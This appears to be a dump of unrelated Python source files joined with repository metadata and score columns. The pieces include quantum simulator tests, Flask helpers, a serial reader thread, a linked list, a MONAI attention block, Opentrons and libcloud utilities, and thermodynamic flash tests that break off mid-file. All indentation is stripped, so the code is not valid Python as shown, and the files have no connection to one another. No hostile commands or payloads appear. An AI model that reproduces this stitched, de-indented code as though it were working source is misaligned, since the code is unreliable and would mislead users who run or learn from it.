assert probability == pytest.approx(.5)
eng.backend.set_wavefunction([1.] + [0.] * 15, qubits)
H | qubits[0]
CNOT | (qubits[0], qubits[1])
eng.flush()
eng.backend.collapse_wavefunction([qubits[0]], [1])
probability = eng.backend.get_probability([1, 1], qubits[0:2])
assert probability == pytest.approx(1.)
def test_simulator_no_uncompute_exception(sim):
eng = MainEngine(sim, [])
qubit = eng.allocate_qubit()
H | qubit
with pytest.raises(RuntimeError):
qubit[0].__del__()
# If you wanted to keep using the qubit, you shouldn't have deleted it.
assert qubit[0].id == -1
def test_simulator_functional_entangle(sim):
eng = MainEngine(sim, [])
qubits = eng.allocate_qureg(5)
# entangle all qubits:
H | qubits[0]
for qb in qubits[1:]:
CNOT | (qubits[0], qb)
# check the state vector:
assert .5 == pytest.approx(abs(sim.cheat()[1][0])**2, rel=tolerance, abs=tolerance)
assert .5 == pytest.approx(abs(sim.cheat()[1][31])**2, rel=tolerance, abs=tolerance)
for i in range(1, 31):
assert 0. == pytest.approx(abs(sim.cheat()[1][i]), rel=tolerance, abs=tolerance)
# unentangle all except the first 2
for qb in qubits[2:]:
CNOT | (qubits[0], qb)
# entangle using Toffolis
for qb in qubits[2:]:
Toffoli | (qubits[0], qubits[1], qb)
# check the state vector:
assert .5 == pytest.approx(abs(sim.cheat()[1][0])**2, rel=tolerance, abs=tolerance)
assert .5 == pytest.approx(abs(sim.cheat()[1][31])**2, rel=tolerance, abs=tolerance)
for i in range(1, 31):
assert 0. == pytest.approx(abs(sim.cheat()[1][i]), rel=tolerance, abs=tolerance)
# uncompute using multi-controlled NOTs
with Control(eng, qubits[0:-1]):
X | qubits[-1]
with Control(eng, qubits[0:-2]):
X | qubits[-2]
with Control(eng, qubits[0:-3]):
X | qubits[-3]
CNOT | (qubits[0], qubits[1])
H | qubits[0]
# check the state vector:
assert 1. == pytest.approx(abs(sim.cheat()[1][0])**2, rel=tolerance, abs=tolerance)
for i in range(1, 32):
assert 0. == pytest.approx(abs(sim.cheat()[1][i]), rel=tolerance, abs=tolerance)
All(Measure) | qubits
def test_simulator_convert_logical_to_mapped_qubits(sim):
mapper = BasicMapperEngine()
def receive(command_list):
pass
mapper.receive = receive
eng = MainEngine(sim, [mapper])
qubit0 = eng.allocate_qubit()
qubit1 = eng.allocate_qubit()
mapper.current_mapping = {qubit0[0].id: qubit1[0].id,
qubit1[0].id: qubit0[0].id}
assert (sim._convert_logical_to_mapped_qureg(qubit0 + qubit1) ==
qubit1 + qubit0)
def slow_implementation(angles, control_qubits, target_qubit, eng, gate_class):
"""
Assumption is that control_qubits[0] is lowest order bit
We apply angles[0] to state |0>
"""
assert len(angles) == 2**len(control_qubits)
for index in range(2**len(control_qubits)):
with Compute(eng):
for bit_pos in range(len(control_qubits)):
if not (index >> bit_pos) & 1:
X | control_qubits[bit_pos]
with Control(eng, control_qubits):
gate_class(angles[index]) | target_qubit
Uncompute(eng)
@pytest.mark.parametrize("gate_classes", [(Ry, UniformlyControlledRy),
(Rz, UniformlyControlledRz)])
def test_uniformly_controlled_r(sim, gate_classes):
n = 2
random_angles = [3.0, 0.8, 1.2, 0.7]
basis_state_index = 2
basis_state = [0] * 2**(n+1)
basis_state[basis_state_index] = 1.
correct_eng = MainEngine(backend=Simulator())
test_eng = MainEngine(backend=sim)
correct_sim = correct_eng.backend
correct_qb = correct_eng.allocate_qubit()
correct_ctrl_qureg = correct_eng.allocate_qureg(n)
correct_eng.flush()
test_sim = test_eng.backend
test_qb = test_eng.allocate_qubit()
test_ctrl_qureg = test_eng.allocate_qureg(n)
test_eng.flush()
correct_sim.set_wavefunction(basis_state, correct_qb + correct_ctrl_qureg)
test_sim.set_wavefunction(basis_state, test_qb + test_ctrl_qureg)
test_eng.flush()
correct_eng.flush()
gate_classes[1](random_angles) | (test_ctrl_qureg, test_qb)
slow_implementation(angles=random_angles,
control_qubits=correct_ctrl_qureg,
target_qubit=correct_qb,
eng=correct_eng,
gate_class=gate_classes[0])
test_eng.flush()
correct_eng.flush()
for fstate in range(2**(n+1)):
binary_state = format(fstate, '0' + str(n+1) + 'b')
test = test_sim.get_amplitude(binary_state,
test_qb + test_ctrl_qureg)
correct = correct_sim.get_amplitude(binary_state, correct_qb +
correct_ctrl_qureg)
print(test, "==", correct)
assert correct == pytest.approx(test, rel=tolerance, abs=tolerance)
All(Measure) | test_qb + test_ctrl_qureg
All(Measure) | correct_qb + correct_ctrl_qureg
test_eng.flush(deallocate_qubits=True)
correct_eng.flush(deallocate_qubits=True)
def test_qubit_operator(sim):
test_eng = MainEngine(sim)
test_qureg = test_eng.allocate_qureg(1)
test_eng.flush()
qubit_op = QubitOperator("X0 X1", 1)
with pytest.raises(Exception):
sim.get_expectation_value(qubit_op, test_qureg)
test_eng.backend.set_wavefunction([1, 0],
test_qureg)
test_eng.flush()
qubit_op = QubitOperator("X0", 1)
qubit_op | test_qureg[0]
test_eng.flush()
amplitude = test_eng.backend.get_amplitude('0', test_qureg)
assert amplitude == pytest.approx(0.)
amplitude = test_eng.backend.get_amplitude('1', test_qureg)
assert amplitude == pytest.approx(1.)
def test_get_expectation_value(sim):
num_qubits = 2
test_eng = MainEngine(sim)
test_qureg = test_eng.allocate_qureg(num_qubits)
test_eng.flush()
qubit_op = QubitOperator("X0 X1 X2", 1)
with pytest.raises(Exception):
sim.get_expectation_value(qubit_op, test_qureg)
qubit_op = QubitOperator("X0", 1)
test_eng.backend.set_wavefunction([1 / math.sqrt(2), 1 / math.sqrt(2), 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(1, rel=tolerance, abs=tolerance))
test_eng.backend.set_wavefunction([1 / math.sqrt(2), -1 / math.sqrt(2), 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(-1, rel=tolerance, abs=tolerance))
qubit_op = QubitOperator("Y0", 1)
test_eng.backend.set_wavefunction([1 / math.sqrt(2), 1j / math.sqrt(2), 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(1, rel=tolerance, abs=tolerance))
test_eng.backend.set_wavefunction([1 / math.sqrt(2), -1j / math.sqrt(2), 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(-1, rel=tolerance, abs=tolerance))
qubit_op = QubitOperator("Z0", 1)
test_eng.backend.set_wavefunction([1, 0, 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(1, rel=tolerance, abs=tolerance))
test_eng.backend.set_wavefunction([0, 1, 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(-1, rel=tolerance, abs=tolerance))
qubit_op = QubitOperator("Z0", 0.25)
test_eng.backend.set_wavefunction([1, 0, 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(0.25, rel=tolerance, abs=tolerance))
test_eng.backend.set_wavefunction([0, 1, 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(-0.25, rel=tolerance, abs=tolerance))
qubit_op = QubitOperator("Z0 Z1", 1)
test_eng.backend.set_wavefunction([1, 0, 0, 0],
test_qureg)
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(1, rel=tolerance, abs=tolerance))
X | test_qureg[0]
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(-1, rel=tolerance, abs=tolerance))
X | test_qureg[1]
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(1, rel=tolerance, abs=tolerance))
X | test_qureg[0]
test_eng.flush()
assert(sim.get_expectation_value(qubit_op, test_qureg) == pytest.approx(-1, rel=tolerance, abs=tolerance))
| 1.710938 | 2 |
app/deps.py | jshwi/jss | 1 | 6823 | <reponame>jshwi/jss<filename>app/deps.py<gh_stars>1-10
"""
app.deps
========
Register dependencies that are not part of a ``Flask`` extension.
"""
from flask import Flask
from redis import Redis
from rq import Queue
def init_app(app: Flask) -> None:
"""Register application helpers that are not ``Flask-`` extensions.
As these are not ``Flask`` extensions they do not have an
``init_app`` method, and so can be attached to the app by declaring
them as instance attributes.
.. todo:: These are not declared in ``__init__`` and are a bit of a
code-smell. Using ``flask.g`` may be more appropriate...
:param app: Application factory object.
"""
app.redis = Redis.from_url(app.config["REDIS_URL"]) # type: ignore
app.task_queue = Queue("jss-tasks", connection=app.redis) # type: ignore
| 1.742188 | 2 |
uncertainty/util/__init__.py | sangdon/intern2020_cocal | 0 | 6824 | from util.args import *
from util.logger import Logger
| 1.171875 | 1 |
com_reader.py | plusterm/plusterm | 2 | 6825 | # from wx.lib.pubsub import pub
from pubsub import pub
import serial
import threading
import queue
import time
class ComReaderThread(threading.Thread):
'''
Creates a thread that continously reads from the serial connection
Puts result as a tuple (timestamp, data) in a queue
'''
def __init__(self, ser, error_que):
threading.Thread.__init__(self)
self.ser = ser
self.error_que = error_que
self.alive = threading.Event()
self.alive.set()
def run(self):
while self.alive.isSet():
try:
if self.ser.in_waiting > 0:
timestamp = time.time()
data = self.ser.read(self.ser.in_waiting)
pub.sendMessage('serial.data', data=(timestamp, data))
except serial.SerialException as e:
reconnected = False
print('Serial connection lost, trying to reconnect.')
ts = time.time()
self.error_que.put((ts, str(e)))
while not reconnected and self.alive.isSet():
try:
# if ser still thinks it's open close it
if self.ser.is_open:
self.ser.close()
self.ser.open()
except Exception as e:
# if reconnection failed let some time pass
time.sleep(0.1)
else:
reconnected = True
print('Reconnected')
def stop(self, timeout=0.5):
self.alive.clear()
threading.Thread.join(self, timeout)
| 2.875 | 3 |
docker/app/app.py | ganeshkumarsv/datadog-cloudfoundry-buildpack | 5 | 6826 | <reponame>ganeshkumarsv/datadog-cloudfoundry-buildpack
from flask import Flask
from datadog import statsd
import logging
import os
# This is a small example application
# It uses tracing and dogstatsd on a sample flask application
log = logging.getLogger("app")
app = Flask(__name__)
# The app has two routes, a basic endpoint and an exception endpoint
@app.route("/")
def hello():
statsd.increment('request.number', 1, tags=["test", "foo:bar", "my:app"])
log.info("Got a request at hello")
return "Hello World!"
@app.route("/error")
def error():
statsd.increment('request.error.number', 1, tags=["test", "foo:bar", "my:app"])
log.info("Got a request at error")
raise Exception()
# This is meant to be run directly, instead of executed through flask run
if __name__ == '__main__':
# It grabs the host and port from the environment
port = 5001
host = '0.0.0.0'
if os.environ.get('HOST'):
host = os.environ.get('HOST')
if os.environ.get('PORT'):
port = os.environ.get('PORT')
app.run(debug=True, host=host, port=port)
| 2.40625 | 2 |
Data Structure using Python/Linked_List/2linked_list1.py | shubhamsah/OpenEDU | 1 | 6827 | # Lets create a linked list that has the following elements
'''
1. FE
2. SE
3. TE
4. BE
'''
# Creating a Node class to create individual Nodes
class Node:
def __init__(self,data):
self.__data = data
self.__next = None
def get_data(self):
return self.__data
def set_data(self, data):
self.__data = data
def get_next(self):
return self.__next
def set_next(self,next_node):
self.__next = next_node
class LinkedList:
def __init__(self):
self.__head = None
self.__tail = None
def get_head(self):
return self.__head
def get_tail(self):
return self.__tail
# ADDING ELEMENT IN THE LINKED LIST
def add(self,data):
new_node = Node(data)
if(self.__head==None):
self.__head=self.__tail=new_node
else:
self.__tail.set_next(new_node)
self.__tail=new_node
number_list= LinkedList()
number_list.add("FE")
number_list.add("SE")
number_list.add("TE")
number_list.add("BE")
| 3.953125 | 4 |
monai/networks/blocks/selfattention.py | function2-llx/MONAI | 1 | 6828 | <gh_stars>1-10
# Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import torch.nn as nn
from monai.utils import optional_import
Rearrange, _ = optional_import("einops.layers.torch", name="Rearrange")
class SABlock(nn.Module):
"""
A self-attention block, based on: "Dosovitskiy et al.,
An Image is Worth 16x16 Words: Transformers for Image Recognition at Scale <https://arxiv.org/abs/2010.11929>"
"""
def __init__(self, hidden_size: int, num_heads: int, dropout_rate: float = 0.0) -> None:
"""
Args:
hidden_size: dimension of hidden layer.
num_heads: number of attention heads.
dropout_rate: faction of the input units to drop.
"""
super().__init__()
if not (0 <= dropout_rate <= 1):
raise ValueError("dropout_rate should be between 0 and 1.")
if hidden_size % num_heads != 0:
raise ValueError("hidden size should be divisible by num_heads.")
self.num_heads = num_heads
self.out_proj = nn.Linear(hidden_size, hidden_size)
self.qkv = nn.Linear(hidden_size, hidden_size * 3, bias=False)
self.input_rearrange = Rearrange("b h (qkv l d) -> qkv b l h d", qkv=3, l=num_heads)
self.out_rearrange = Rearrange("b h l d -> b l (h d)")
self.drop_output = nn.Dropout(dropout_rate)
self.drop_weights = nn.Dropout(dropout_rate)
self.head_dim = hidden_size // num_heads
self.scale = self.head_dim**-0.5
def forward(self, x):
output = self.input_rearrange(self.qkv(x))
q, k, v = output[0], output[1], output[2]
att_mat = (torch.einsum("blxd,blyd->blxy", q, k) * self.scale).softmax(dim=-1)
att_mat = self.drop_weights(att_mat)
x = torch.einsum("bhxy,bhyd->bhxd", att_mat, v)
x = self.out_rearrange(x)
x = self.out_proj(x)
x = self.drop_output(x)
return x
| 2.171875 | 2 |
api/tests/opentrons/commands/test_protocol_commands.py | mrakitin/opentrons | 0 | 6829 | <reponame>mrakitin/opentrons
import pytest
from opentrons.commands import protocol_commands
@pytest.mark.parametrize(
argnames="seconds,"
"minutes,"
"expected_seconds,"
"expected_minutes,"
"expected_text",
argvalues=[
[10, 0, 10, 0, "Delaying for 0 minutes and 10.0 seconds"],
[10, 9, 10, 9, "Delaying for 9 minutes and 10.0 seconds"],
[100, 0, 40, 1, "Delaying for 1 minutes and 40.0 seconds"],
[105, 5.25, 0, 7, "Delaying for 7 minutes and 0.0 seconds"],
[0.5, 0, 0.5, 0, "Delaying for 0 minutes and 0.5 seconds"],
[105.5, 5.25, 0.5, 7, "Delaying for 7 minutes and 0.5 seconds"],
[0.998, 0, 0.998, 0, "Delaying for 0 minutes and 0.998 seconds"],
[0.9998, 0, 0.9998, 0, "Delaying for 0 minutes and 1.0 seconds"],
[1.0001, 0, 1.0001, 0, "Delaying for 0 minutes and 1.0 seconds"],
]
)
def test_delay(seconds,
minutes,
expected_seconds,
expected_minutes,
expected_text
):
command = protocol_commands.delay(seconds, minutes)
name = command['name']
payload = command['payload']
assert name == 'command.DELAY'
assert payload['seconds'] == expected_seconds
assert payload['minutes'] == expected_minutes
assert payload['text'] == expected_text
def test_delay_with_message():
"""It should allow a message to be appended to the delay text."""
command = protocol_commands.delay(seconds=1, minutes=1, msg="Waiting...")
assert command["payload"]["text"] == (
"Delaying for 1 minutes and 1.0 seconds. Waiting..."
)
| 2.578125 | 3 |
tests/test_histogram_source.py | ess-dmsc/just-bin-it | 0 | 6830 | from unittest.mock import patch
import pytest
from just_bin_it.endpoints.sources import HistogramSource
from tests.doubles.consumer import StubConsumer
TEST_MESSAGE = b"this is a byte message"
INVALID_FB = b"this is an invalid fb message"
class TestHistogramSource:
@pytest.fixture(autouse=True)
def prepare(self):
pass
def test_if_no_consumer_supplied_then_raises(self):
with pytest.raises(Exception):
HistogramSource(None)
def test_if_no_new_messages_then_no_data(self):
mock_consumer = StubConsumer(["broker1"], ["topic1"])
mock_consumer.add_messages([])
hs = HistogramSource(mock_consumer)
data = hs.get_new_data()
assert len(data) == 0
@patch("just_bin_it.endpoints.sources.deserialise_hs00", return_value=TEST_MESSAGE)
def test_if_five_new_messages_on_one_topic_then_data_has_five_items(
self, mock_method
):
mock_consumer = StubConsumer(["broker1"], ["topic1"])
mock_consumer.add_messages([TEST_MESSAGE] * 5)
hs = HistogramSource(mock_consumer)
data = hs.get_new_data()
_, _, message = data[0]
assert len(data) == 5
assert message == TEST_MESSAGE
def test_deserialising_invalid_fb_does_not_throw(self):
mock_consumer = StubConsumer(["broker1"], ["topic1"])
mock_consumer.add_messages([INVALID_FB])
hs = HistogramSource(mock_consumer)
hs.get_new_data()
| 2.484375 | 2 |
lctools/shortcuts.py | novel/lc-tools | 5 | 6831 | import getopt
import sys
from libcloud.compute.types import NodeState
from lc import get_lc
from printer import Printer
def lister_main(what, resource=None,
extension=False, supports_location=False, **kwargs):
"""Shortcut for main() routine for lister
tools, e.g. lc-SOMETHING-list
@param what: what we are listing, e.g. 'nodes'
@param extension: is it an extension of core libcloud functionality?
@param kwargs: additional arguments for the call
@type what: C{string}
@param supports_location: tells that objects we
listing could be filtered by location
@type supports_location: C{bool}
"""
list_method = "%slist_%s" % ({True: 'ex_', False: ''}[extension], what)
profile = "default"
format = location = None
options = "f:p:"
if supports_location:
options += "l:"
try:
opts, args = getopt.getopt(sys.argv[1:], options)
except getopt.GetoptError, err:
sys.stderr.write("%s\n" % str(err))
sys.exit(1)
for o, a in opts:
if o == "-f":
format = a
if o == "-p":
profile = a
if o == "-l":
location = a
try:
conn = get_lc(profile, resource=resource)
list_kwargs = kwargs
if supports_location and location is not None:
nodelocation = filter(lambda loc: str(loc.id) == location,
conn.list_locations())[0]
list_kwargs["location"] = nodelocation
for node in getattr(conn, list_method)(**list_kwargs):
Printer.do(node, format)
except Exception, err:
sys.stderr.write("Error: %s\n" % str(err))
def save_image_main():
"""Shortcut for main() routine for provider
specific image save tools.
"""
def usage(progname):
sys.stdout.write("%s -i <node_id> -n <image_name> [-p <profile]\n\n" % progname)
profile = 'default'
name = node_id = None
try:
opts, args = getopt.getopt(sys.argv[1:], "i:n:p:")
except getopt.GetoptError, err:
sys.stderr.write("%s\n" % str(err))
sys.exit(1)
for o, a in opts:
if o == "-i":
node_id = a
if o == "-n":
name = a
if o == "-p":
profile = a
if node_id is None or name is None:
usage(sys.argv[0])
sys.exit(1)
conn = get_lc(profile)
node = get_node_or_fail(conn, node_id, print_error_and_exit,
("Error: cannot find node with id '%s'." % node_id,))
Printer.do(conn.ex_save_image(node, name))
def get_node_or_fail(conn, node_id, coroutine=None, cargs=(), ckwargs={}):
"""Shortcut to get a single node by its id. In case when
such node could not be found, coroutine could be called
to handle such case. Typically coroutine will output an
error message and exit from application.
@param conn: libcloud connection handle
@param node_id: id of the node to search for
@param coroutine: a callable object to handle case
when node cannot be found
@param cargs: positional arguments for coroutine
@param kwargs: keyword arguments for coroutine
@return: node object if found, None otherwise"""
try:
node = [node for node in conn.list_nodes()
if str(node.id) == str(node_id)][0]
return node
except IndexError:
if callable(coroutine):
coroutine(*cargs, **ckwargs)
return None
def print_error_and_exit(message):
sys.stderr.write("%s\n" % message)
sys.exit(1)
| 2.578125 | 3 |
tests/test_flash_vl.py | andr1976/thermo | 380 | 6832 | <reponame>andr1976/thermo
# -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2020, <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
import pytest
from fluids.core import C2K
import thermo
from chemicals.utils import *
from thermo import *
from fluids.numerics import *
from math import *
import json
import os
import numpy as np
def test_C2_C5_PR():
T, P = 300, 3e6
constants = ChemicalConstantsPackage(Tcs=[305.32, 469.7], Pcs=[4872000.0, 3370000.0],
omegas=[0.098, 0.251], Tms=[90.3, 143.15],
Tbs=[184.55, 309.21], CASs=['74-84-0', '109-66-0'],
names=['ethane', 'pentane'], MWs=[30.06904, 72.14878])
HeatCapacityGases = [HeatCapacityGas(poly_fit=(50.0, 1000.0, [7.115386645067898e-21, -3.2034776773408394e-17, 5.957592282542187e-14, -5.91169369931607e-11, 3.391209091071677e-08, -1.158730780040934e-05, 0.002409311277400987, -0.18906638711444712, 37.94602410497228])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [7.537198394065234e-22, -4.946850205122326e-18, 1.4223747507170372e-14, -2.3451318313798008e-11, 2.4271676873997662e-08, -1.6055220805830093e-05, 0.006379734000450042, -1.0360272314628292, 141.84695243411866]))]
correlations = PropertyCorrelationsPackage(constants, HeatCapacityGases=HeatCapacityGases)
zs = ws_to_zs(MWs=constants.MWs, ws=[.5, .5])
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas': constants.omegas}
gas = CEOSGas(PRMIX, eos_kwargs, HeatCapacityGases=HeatCapacityGases, T=T, P=P, zs=zs)
liq = CEOSLiquid(PRMIX, eos_kwargs, HeatCapacityGases=HeatCapacityGases, T=T, P=P, zs=zs)
flasher = FlashVL(constants, correlations, liquid=liq, gas=gas)
# Check there are two phases near the dew point. don't bother checking the composition most of the time.
# When this test was written, case is still valid for a dP of 0.00000001 Pa
# Issue here was that (sum_criteria < 1e-7) was the check in the stability test result interpretation
# Fixed it by decreasing the tolerance 10x (1e-8)
res = flasher.flash(P=5475649.470049857+15, T=123.3+273.15, zs=zs)
assert_close1d(res.betas, [0.9999995457838572, 4.5421614280893863e-07], rtol=1e-4)
assert_close1d(res.gas.zs, [0.7058337751720506, 0.29416622482794935], rtol=1e-4)
assert_close1d(res.liquid0.zs, [0.49517964670906095, 0.504820353290939], rtol=1e-4)
# # In this case, the tolerance had to be decreased 10x more - to 1e-9! Triggered at a dP of 0.5
res = flasher.flash(P=5475649.470049857+0.5, T=123.3+273.15, zs=zs)
assert_close1d(res.betas, [0.999999984859061, 1.5140938947055815e-08], rtol=1e-4)
assert_close1d(res.gas.zs, [0.7058336826506021, 0.29416631734939785])
assert_close1d(res.liquid0.zs, [0.4951780663825745, 0.5048219336174254])
# # This one is too close to the border - the VF from SS is less than 0,
# # but if the tolerance is increased, it is positive (and should be)
res = flasher.flash(P=5475649.470049857+0.001, T=123.3+273.15, zs=zs)
assert_close1d(res.betas, [0.9999999999697144, 3.028555184414472e-11], rtol=3e-3)
assert_close1d(res.gas.zs, [0.7058336794959247, 0.29416632050407526])
assert_close1d(res.liquid0.zs, [0.49517801199759515, 0.5048219880024049])
# This one is presently identified as a LL... just check the number of phases
assert flasher.flash(zs=zs, P=6.615e6, T=386).phase_count == 2
def test_flash_TP_K_composition_idependent_unhappiness():
constants = ChemicalConstantsPackage(Tcs=[508.1, 536.2, 512.5], Pcs=[4700000.0, 5330000.0, 8084000.0], omegas=[0.309, 0.21600000000000003, 0.5589999999999999],
MWs=[58.07914, 119.37764000000001, 32.04186], CASs=['67-64-1', '67-66-3', '67-56-1'], names=['acetone', 'chloroform', 'methanol'])
HeatCapacityGases = [HeatCapacityGas(poly_fit=(200.0, 1000.0, [-1.3320002425347943e-21, 6.4063345232664645e-18, -1.251025808150141e-14, 1.2265314167534311e-11, -5.535306305509636e-09, -4.32538332013644e-08, 0.0010438724775716248, -0.19650919978971002, 63.84239495676709])),
HeatCapacityGas(poly_fit=(200.0, 1000.0, [1.5389278550737367e-21, -8.289631533963465e-18, 1.9149760160518977e-14, -2.470836671137373e-11, 1.9355882067011222e-08, -9.265600540761629e-06, 0.0024825718663005762, -0.21617464276832307, 48.149539665907696])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [2.3511458696647882e-21, -9.223721411371584e-18, 1.3574178156001128e-14, -8.311274917169928e-12, 4.601738891380102e-10, 1.78316202142183e-06, -0.0007052056417063217, 0.13263597297874355, 28.44324970462924]))]
VolumeLiquids = [VolumeLiquid(poly_fit=(178.51, 498.1, [6.564241965071999e-23, -1.6568522275506375e-19, 1.800261692081815e-16, -1.0988731296761538e-13, 4.118691518070104e-11, -9.701938804617744e-09, 1.4022905458596618e-06, -0.00011362923883050033, 0.0040109650220160956])),
VolumeLiquid(poly_fit=(209.63, 509.5799999999999, [2.034047306563089e-23, -5.45567626310959e-20, 6.331811062990084e-17, -4.149759318710192e-14, 1.6788970104955462e-11, -4.291900093120011e-09, 6.769385838271721e-07, -6.0166473220815445e-05, 0.0023740769479069054])),
VolumeLiquid(poly_fit=(175.7, 502.5, [3.5725079384600736e-23, -9.031033742820083e-20, 9.819637959370411e-17, -5.993173551565636e-14, 2.2442465416964825e-11, -5.27776114586072e-09, 7.610461006178106e-07, -6.148574498547711e-05, 0.00216398089328537])),]
VaporPressures = [VaporPressure(exp_poly_fit=(178.51, 508.09000000000003, [-1.3233111115238975e-19, 4.2217134794609376e-16, -5.861832547132719e-13, 4.6488594950801467e-10, -2.3199079844570237e-07, 7.548290741523459e-05, -0.015966705328994194, 2.093003523977292, -125.39006100979816])),
VaporPressure(exp_poly_fit=(207.15, 536.4, [-8.714046553871422e-20, 2.910491615051279e-16, -4.2588796020294357e-13, 3.580003116042944e-10, -1.902612144361103e-07, 6.614096470077095e-05, -0.01494801055978542, 2.079082613726621, -130.24643185169472])),
VaporPressure(exp_poly_fit=(175.7, 512.49, [-1.446088049406911e-19, 4.565038519454878e-16, -6.278051259204248e-13, 4.935674274379539e-10, -2.443464113936029e-07, 7.893819658700523e-05, -0.016615779444332356, 2.1842496316772264, -134.19766175812708]))]
liquid = GibbsExcessLiquid(VaporPressures=VaporPressures, VolumeLiquids=VolumeLiquids,
HeatCapacityGases=HeatCapacityGases, use_Poynting=True,
use_phis_sat=False)
correlations = PropertyCorrelationsPackage(constants=constants, skip_missing=True, HeatCapacityGases=HeatCapacityGases,
VolumeLiquids=VolumeLiquids, VaporPressures=VaporPressures)
T, P = 350.0, 1e6
zs = [0.2, 0.0, 0.8]
eos_kwargs = {'Pcs': constants.Pcs, 'Tcs': constants.Tcs, 'omegas':constants.omegas}
gas = IdealGas(HeatCapacityGases=HeatCapacityGases, T=T, P=P, zs=zs)
flashN = FlashVLN(constants, correlations, liquids=[liquid], gas=gas)
# Low - all K under zero
res = flashN.flash(T=T, P=P, zs=zs)
assert_close(res.rho_mass(), 733.1047159397776)
assert 1 == res.phase_count
assert res.liquid0 is not None
# High - all K above zero
res = flashN.flash(T=430, P=1e4, zs=zs)
assert 1 == res.phase_count
assert res.gas is not None
assert_close(res.rho_mass(), 0.10418751067559757)
# One K value is under 1, rest are above - but that component has mole frac of zero
res = flashN.flash(T=420, P=1e4, zs=zs)
assert 1 == res.phase_count
assert res.gas is not None
# phis_at for liquids was broken, breaking this calculation
res = flashN.flash(T=285.5, P=1e4, zs=zs)
assert_close1d(res.betas, [0.21860038882559643, 0.7813996111744036])
assert res.phase_count == 2
# Two cases RR was working on Ks less than 1, and coming up with a made up VF
# Need to check Ks first
res = flashN.flash(T=300.0000, P=900000.0000, zs=[0.5, 0.1, 0.4, 0.0],)
assert 1 == res.phase_count
assert res.gas is None
res = flashN.flash(T=300.0000, P=900000.0000, zs=[.5, 0, 0, .5])
assert 1 == res.phase_count
assert res.gas is None
def test_flash_combustion_products():
P = 1e5
T = 794.5305048838037
zs = [0.5939849621247668, 0.112781954982051, 0.0676691730155464, 0.2255639098776358]
constants = ChemicalConstantsPackage(atomss=[{'N': 2}, {'C': 1, 'O': 2}, {'O': 2}, {'H': 2, 'O': 1}], CASs=['7727-37-9', '124-38-9', '7782-44-7', '7732-18-5'], MWs=[28.0134, 44.0095, 31.9988, 18.01528], names=['nitrogen', 'carbon dioxide', 'oxygen', 'water'], omegas=[0.04, 0.2252, 0.021, 0.344], Pcs=[3394387.5, 7376460.0, 5042945.25, 22048320.0], Tbs=[77.355, 194.67, 90.18799999999999, 373.124], Tcs=[126.2, 304.2, 154.58, 647.14], Tms=[63.15, 216.65, 54.36, 273.15])
correlations = PropertyCorrelationsPackage(constants=constants, skip_missing=True,
HeatCapacityGases=[HeatCapacityGas(poly_fit=(50.0, 1000.0, [-6.496329615255804e-23, 2.1505678500404716e-19, -2.2204849352453665e-16, 1.7454757436517406e-14, 9.796496485269412e-11, -4.7671178529502835e-08, 8.384926355629239e-06, -0.0005955479316119903, 29.114778709934264])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [-3.1115474168865828e-21, 1.39156078498805e-17, -2.5430881416264243e-14, 2.4175307893014295e-11, -1.2437314771044867e-08, 3.1251954264658904e-06, -0.00021220221928610925, 0.000884685506352987, 29.266811602924644])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [7.682842888382947e-22, -3.3797331490434755e-18, 6.036320672021355e-15, -5.560319277907492e-12, 2.7591871443240986e-09, -7.058034933954475e-07, 9.350023770249747e-05, -0.005794412013028436, 29.229215579932934])),
HeatCapacityGas(poly_fit=(50.0, 1000.0, [5.543665000518528e-22, -2.403756749600872e-18, 4.2166477594350336e-15, -3.7965208514613565e-12, 1.823547122838406e-09, -4.3747690853614695e-07, 5.437938301211039e-05, -0.003220061088723078, 33.32731489750759]))])
